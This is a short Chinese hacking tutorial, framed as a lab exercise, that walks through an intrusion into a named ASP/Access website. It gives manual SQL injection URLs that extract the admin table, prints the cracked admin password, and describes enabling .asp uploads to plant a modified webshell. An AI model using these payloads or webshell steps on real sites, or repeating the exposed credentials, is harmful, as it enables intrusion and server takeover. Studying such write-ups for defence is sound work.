黑防脚本实验室基础篇 by honghack

点评：条理清晰，没什么遗漏。

一、入侵思路：
1、找注入点（并确定数据库类型）。
2、通过注入点，猜解库名、表名、字段名、字段值。
3、找到后台登录地址，用猜解出的用户名、密码，登录后台。
4、查看后台程序是有上传文件、备份/恢复数据库之漏洞。
5、通过上传文件或备份/恢复数据的漏洞，将木马载入。

二、入侵过程：
1、前台“信息搜索”模块，存在搜索型注入的问题，搜索的文本框未过滤危险字符，从这里下手，通过错误提示可知道数据库为access。

2、未使用工具，通过手工进行注入。

3、经过几番尝试，http://zst.8800.org/NewsList.asp?Key=宋%25' and (select count(*) from idea_admin)>0 and '%25'=' 猜出表名。

4、http://zst.8800.org/NewsList.asp?Key=宋%25' and (select count(username) from idea_admin)>0 and '%25'=' 猜出username字段名，一样的方法也猜到有password字段。

5、http://zst.8800.org/NewsList.asp?Key=宋%25' and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12,13 from idea_admin where '%25'='
最后猜出用户名为：admin，密码为：07f71bc69d096d8e。大家看到吧，直接就把密码猜出来，这里为什么union后面跟到13，因为NewsList.asp相关的表idea_news里有13个字段，大家看源码即可，还可以看看union相关的语法。刚才直接显示是密码，再显示下用户名，用户名是admin。至此用户名、密码都猜出来。接着就爆md5即可

6、上网搜了个在线破解md5的东东http://www.md5.org.cn)，密码明文为：admin666

7、后台很容易猜，admin/login.asp（晕，做教程时，网站掉链子），成功进入后台。找找有没有上传文件的地方，有对上传文件扩展名的管理，大家看到了有asp文件，这是我刚才传马时留下，原来没有。只要加一下就行，没有什么程序限制。

8、随便传1个马儿就行，我用的是海洋，服务器不允许wscript.shell，将海洋稍做修改，重新上传可，可以用了(上传木马，大家可以自行发挥)。

9、看到海洋登录界面吧，剩下咋玩，就不用介绍了吧，大家发挥想像力吧。完成。